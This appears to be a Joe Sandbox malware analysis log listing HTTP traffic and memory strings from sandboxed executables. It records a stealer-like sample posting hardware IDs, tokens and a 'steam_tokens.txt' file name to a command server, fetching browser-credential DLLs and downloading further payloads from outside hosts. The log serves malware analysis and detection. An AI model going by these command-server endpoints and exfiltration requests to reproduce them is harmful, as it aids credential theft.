Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJJDGHJKKJEBFHJDBGHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBKHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="file"------IEBFHCAKFBGDHIDHIDBK--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJHost: 185.172.128.76Content-Length: 148851Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 31 38 31 38 31 36 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 2d 2d 0d 0a Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="message"1818166------EHJKJDGCGDAKFHIDBGCB--

Source: Joe Sandbox View

IP Address: 185.172.128.90 185.172.128.90

Source: Joe Sandbox View

ASN Name: NADYMSS-ASRU NADYMSS-ASRU

Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Qg_Appv5.exe HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Code function: 0_2_00426504 __EH_prolog,SetThreadLocale,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,

0_2_00426504

Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Qg_Appv5.exe HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: note.padd.cn.com

Source: unknown

HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 32 44 30 30 41 35 41 30 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"5F2D00A5A0C62507286958------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default10------AAEBAFBGIDHCBFHIECFC--

Source: u48o.0.exe, 0000000A.00000002.1687631765.000000000405E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllG
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllU
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dllc
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dllq
Source: u48o.0.exe, 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll9
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php#
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php$
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php/
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php/m
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php3m1
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php7
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php8f03eaf3f74425202cfbbd470d578ult-release
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpB
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpMM
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpR
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpa
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpf
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phphm
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpk
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phps
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
Source: u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpz
Source: u48o.0.exe, 0000000A.00000002.1687631765.000000000405E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76H
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
